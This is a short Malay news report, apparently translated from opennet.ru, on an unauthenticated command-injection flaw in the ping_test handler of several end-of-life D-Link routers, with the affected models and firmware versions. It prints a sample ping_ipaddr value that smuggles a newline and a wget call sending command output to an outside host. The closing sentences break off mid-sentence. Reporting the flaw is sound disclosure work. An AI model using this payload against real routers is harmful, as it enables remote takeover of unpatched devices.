Dalam penghala wayarles D-Link
Menariknya, menurut pembangun perisian tegar, panggilan "ping_test" harus dilaksanakan hanya selepas pengesahan, tetapi pada hakikatnya ia dipanggil dalam apa jua keadaan, tanpa mengira log masuk ke antara muka web. Khususnya, apabila mengakses skrip apply_sec.cgi dan menghantar parameter "action=ping_test", skrip mengubah hala ke halaman pengesahan, tetapi pada masa yang sama melakukan tindakan yang dikaitkan dengan ping_test. Untuk melaksanakan kod tersebut, kelemahan lain telah digunakan dalam ping_test itu sendiri, yang memanggil utiliti ping tanpa menyemak dengan betul alamat IP yang dihantar untuk ujian. Sebagai contoh, untuk memanggil utiliti wget dan memindahkan hasil perintah "echo 1234" kepada hos luaran, hanya nyatakan parameter "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
Kehadiran kelemahan telah disahkan secara rasmi dalam model berikut:
- DIR-655 dengan perisian tegar 3.02b05 atau lebih lama;
- DIR-866L dengan perisian tegar 1.03b04 atau lebih lama;
- DIR-1565 dengan perisian tegar 1.01 atau lebih lama;
- DIR-652 (tiada maklumat tentang versi perisian tegar yang bermasalah disediakan)
Tempoh sokongan untuk model ini telah pun tamat, jadi D-Link
Ia kemudiannya mendapati bahawa kelemahan itu juga
Sumber: opennet.ru